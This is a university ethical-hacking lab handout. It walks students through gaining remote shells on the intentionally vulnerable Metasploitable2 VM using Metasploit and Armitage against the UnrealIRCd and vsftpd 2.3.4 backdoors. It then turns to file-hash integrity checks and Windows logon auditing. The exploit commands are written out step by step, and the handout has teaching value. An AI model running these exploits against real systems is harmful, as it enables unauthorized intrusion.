CYB-430&530: Ethical Hacking
LAB-06: Metasploit Framework & Host Hardening
1. Lab Overview
In this lab, you will learn how to use Metasploit to gain access to a remote machine. The goal is to teach you the basics of practical penetration testing. The Metasploit Framework (MSF) contains a collection of exploits. It’s an infrastructure that can be used to build upon and utilize for custom needs. This helps you to concentrate on setting up your exploitation environments, and not have to reinvent the wheel. MSF is one of the most popular tools for security professionals conducting practical hacking studies. It contains an extensive exploitation tools and working environments. Additionally, it is free available to public.
Two Linux virtual machines will be used: One is a Kali Linux with Metasploit framework installed; and the other one is intentionally vulnerable Linux. This LAB will use the Metasploit framework on Kali Linux to remotely gain access on the vulnerable Linux machine.
2. Lab Environment
· The VirtualBox VM Software
https://www.virtualbox.org/wiki/Downloads
· The Kali Linux, Penetration Testing Distribution
https://www.kali.org/downloads/
· Metasploit: Penetration Testing Software
· Metasploitable2: Vulnerable Linux Platform
http://sourceforge.net/projects/metasploitable/files/Metasploitable2/
3. Lab Task – 1: Metasploit Framework
Part I: Starting Virtual Machines
Two VMs is needed for this lab: The Kali Linux and the Metasploitable2-Linux.
Step 1: Start up the Kali Linux.
Step 2: Login the Kali Linux with username and password. Below is the screen snapshot after login.
Step 3: Then, select Metasploitble2-Linux, and press Start up. This is an intentionally vulnerable Linux VM to attack against.
Step 4: Log into the virtual machine with username, msfadmin, and password msfadmin.
Step 5: After logging into the VM, should show the screen below.
Part II: Setting up the Environment for Metasploit on Kali Linux
In order to use the Metasploit framework, first setup the environment such as starting the database for it in Kali Linux.
Step 1: After logging into the Kali Linux, open up a terminal by clicking the icon .
Step 2: Metasploit Framework uses PostgreSQL as its database, so you need to launch it by running the following command in the terminal:
$ service postgresql start
Step 3: You can verify that PostgreSQL is running by executing the following command:
$ service postgresql status
Step 4: With PostgreSQL up and running, you need to create and initialize the msf database by executing the following command:
$ msfdb init
The screenshot above shows the command to start a database for Metasploit Framework.
Part III: Starting Metasploit Framework
Step 1: Launch the Metasploit Console by click on the Metasploit icon or type following command in a terminal.
$ msfconsole
Step 2: Use msfconsole to verify if the database is connected as shown in the screenshot below.
Step 3: Type help in msf console to get the core and database commands as shown below.
More: https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/
Part IV: Identifying the Attacking Target
For the purpose of this lab, it uses Metasploitable2-Linux as the attacking target. First, we need to find the host IP address of the target to launch a remote exploitation. You can use the command “ifconfig” (ipconfig is the windows equivalent). This command allows you to find all the connected interfaces and network cards.
Go to the Metasploitable2-Linux VM and execute the following command.
$ iifconfig
From the screenshot above, the IP address of the network interface, eth0, is 172.16.108.172. This is the IP address for the target that you will set later in this lab.
Part V: Identifying the Vulnerabilities on the Target
The target, Metasploitable2-Linux, is an intentionally vulnerable machine. It contains vulnerabilities that could be remotely exploited.
UnreaIRCD IRC Daemon Backdoor
On port 6667, Metasploitable2 runs the UnreaIRCD IRC daemon. This version contains a backdoor that went unnoticed for months - triggered by sending the letters "AB" following by a system command to the server on any listening port. Metasploit has a module to exploit this in order to gain an interactive shell.
Vsftpd v2.3.4 Backdoor
This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011. Metasploit can exploit the malicious backdoor that was added to the vsftpd download archive.
There are more vulnerabilities that can be exploited on the target. You can find a list of all the vulnerabilities for Metasploitable2 from following links:
https://community.rapid7.com/docs/DOC-1875
and
http://chousensha.github.io/blog/2014/06/03/pentest-lab-metasploitable-2/
Part VI: Launching Attacks Using Metasploit Framework
After identifying the target and vulnerabilities, it is now time to launch attacks.
Step 1: Go to Kali Linux, and start the Metasploit console by typing msfconsole in a terminal.
$ msfconsole
Step 2: Set the module you want to use:
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
Step 3: Here, we use the module for exploiting a backdoor of UnreaIRCD IRC daemon. Then, set the remote host:
msf exploit(unreal_ircd_3281_backdoor) > set RHOST 172.16.108.172
Step 4: The IP address of this LAB Metasploitable2 VM is 172.16.108.172. The VMs have different IP addresses depending on the network configuration. Lastly, type “exploit” to launch the attack.
msf exploit(unreal_ircd_3281_backdoor) > exploit
The screenshot above shows the process of the exploitation using the Metasploit console. We can see that Metasploit successfully gains a shell session, and we are able to execute $ whoami and $ uname –a commands to show that we are in the Metasploitable2 machine from the Kali Linux.
Using Vsftpd v2.3.4 Backdoor to Attack
The example above shows that you can remotely gain access to the target Linux using a backdoor of UnreaIRCD IRC daemon. Now, we are going to use another vulnerability of the target machine (i.e., Vsftpd backdoor) to launch an attack. The steps are similar to the previous attack.
$ msconsole
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > set RHOST 172.16.108.172 msf exploit(vsftpd_234_backdoor) > set payload cmd/unix/interact msf exploit(vsftpd_234_backdoor) > exploit
$ whoami
$ uname -a
Figure shows the Vsftpd Backdoor Command Execution Using Metasploit Framework
Part VII: Armitage - Cyber Attack Management for Metasploit
If still struggle with the commands of msfconsole, Armitage can help. Armitage is a GUI tool for the Metasploit framework that makes penetration testing easy.
Step 1: To start Armitage in Kali Linux, just type armitage in a terminal or click the icon
Step 2: On the pop-up windows, click “connect” and “yes”.
If everything go well, a GUI interface of Armitage should show up.
Step 3: Click on the “Hosts” tab and then click on “Add Hosts”.
Step 4: In the pop-up Window, type the IP address of the Metasploitable2-Linux machine. Then, click “add”.
Step 5: After adding the Metasploitable2 Linux as a target host, right click the host entry and select “Scan”. This will scan the host and identify its vulnerabilities.
Step 6: Before attacking, choose a weapon. Armitage makes this process easy. Select “Attacks” table and then click on “Find Attacks” to generate a custom Attack menu for the host.
Step 7: Next, use the vulnerability, Vsftpd backdoor, mentioned to launch an attack. Right click on the target host, select “Attack” -> “fpt” -> “vsftpd_234_backdoor”.
Step 8: Select “Use a reverse connection” and press “Launch”
Step 9: The console in Armitage shows the exploitation is successfully launched.
Step 10: Right Click on the host entry and select “Shell 1” -> “Interact”
Step 11: A new tab with the shell will open in the area below. The commands “whoami” and “uname –a” to show that it successfully exploited the host.
4. Lab Task – 2: File Integrity in O/S Security
FileVerifier++® is a tool that will compute hashes on any single file, or all of your files at once. These hashes are then checked to see if there have been any changes to those files. FileVerifier++ can quickly check the integrity of a large number of files.
FileVerifier++ is useful if you need to verify that a given set of files has not been changed or altered in any way. For example, it could be used to verify that customer, employee, financial, or sales records were not manipulated. If a file was changed without authorization, it can be compared with an earlier version to determine which changes were made. Using a file verifier is a way IT security professionals can detect a possible intrusion.
1. Download and install FileVerifier++ from http://www.programmingunlimited.net.
2. Click Start Menu and search for FileVerifier++.
3. In FileVerifier, click the Options button.
4. Change the Default Algorithm to MD5.
5. Click OK.
6. Click on the Dirs button to select the directories you want. (You can also select individual files.)
7. Browse to and select your downloads directory.
8. Click OK.
9. Take a screenshot.
10. Click the Verify All button. (Browse to your downloads directory if necessary.)
11. Click OK.
12. Take a screenshot.
13. Create a new text file named YourNameHash.txt, and save it in your downloads folder. (Replace YourName with your first and last names.)
14. Open the text file labeled YourNameHash.txt you just created in your downloads folder.
15. Add your name to the contents of the text file.
16. Save your changes to that text file by clicking File and Save.
17. Close the text file.
18. In the FileVerifier++ window, click Verify All again. (Browse to your downloads folder if necessary.)
19. Scroll down until you can see the text file that you changed. (It should be highlighted in red.)
20. Take a screenshot.
5. Lab Task – 3: Logs Analysis in O/S Security
Good administrators check their logs regularly. They need to know what went on when they were away. They need to look for intruders, compromised machines, stolen or deleted files, and so on. The list of things to look for can be extensive.
Microsoft Windows Event Viewer® is a simple program that organizes these logs in a way that makes them easy to view. Learning how Event Viewer works is a great training platform for beginners. It is also a useful diagnostic tool.In this example, you will enable logging of security events, log in and out of your machine, and then look up the event in Event Viewer.
1. Click on the Windows Start Menu and search for Local Security Policy.
2. Click on Local Policies and Audit Policy.
3. Double-click on the policy labeled “Audit account logon events.”
4. Select both Success and Failure.
5. Click OK.
6. Double-click on the policy labeled “Audit logon events.”
7. Select both Success and Failure.
8. Click OK.
9. Take a screenshot.
10. In the control panel, click System and Security, Administrative Tools, and Event Viewer.
11. Click Windows Logs and Security.
12. Take a screenshot.
13. Log off your computer (you don’t need to shut down) by clicking Start, the drop-down menu next to Shut down, and Log Off.
14. Log onto your computer by clicking your username and entering your password.
15. In the control panel, click System and Security, Administrative Tools, and Event Viewer.
16. Click Windows Logs and Security.
17. Take a screenshot.
18. Double-click on the Logon/Logoff event that was just recorded.
19. Take a screenshot.
20. Click Close.
21. Click Applications and Services Logs and Microsoft Office Sessions.
22. Click on one of the log events.
23. Take a screenshot.
6. Lab Task – 4: THOUGHT QUESTIONS
1. Will these security logs track failed logon attempts? From remote machines too?
2. Will it track security events other than just logon/logoff events?
3. Can you use Event Viewer to view other logs?
4. Why is there a log that tracks which Microsoft office programs you use and how long you use them?
5. How could a top-notch hacker keep you from knowing which files were changed?
6. Can you calculate a hash for a single file?
7. From the hash could you tell what was changed in the file?
8. Can you use the longest hash possible? How long is good enough?
9. Why do we need to assign an internal IP address (i.e., behind NAT) for Metasploitable2-Linux? What will happen if we assign a public IP to it?
10. Besides the two vulnerabilities we used, exploit another vulnerability using both msfconsole and Armitage. Show that you have placed a file in the exploited remote machine via screenshots and by creating the file with the command “touch ” where should be replaced with your full name.
7. Submission Instructions
1. Complete all the tasks assigned in the lab. Take screenshots of all major steps involved in this LAB. Paste the screenshots into a MS-Word file and if available, add the source code of the entire program (Not all labs have codes). Rename the MS-Word report file into “LAB-06-Group_XX” format.
2. You are not always required to follow my steps as it is, you can come up with your own ideas in your own ways to solve the same problem.
3. Try your best to prepare well organized lab report with step by step description for each screenshot.
4. Submit your LAB report to the D2L “LAB-06” drop-box by only one member of each group within one week from the assigned date.
NOTE-1: Please add, 1.All group member’s names (LAST_NAME, FIRST_NAME) and 2.Page numbers in to the report. If you would, you can create a cover page for each LAB, but not necessary.
NOTE-2: Please add all group member’s contributions to complete and submit this lab as a percentage as shown below at the end of the report. (Before submitting to D2L all of the group members must be aware their reported contribution as a percentage in the lab report)
Example:
Member-01: 100%
Member-02: 75%
Member-03: 100%
Member-04: 50%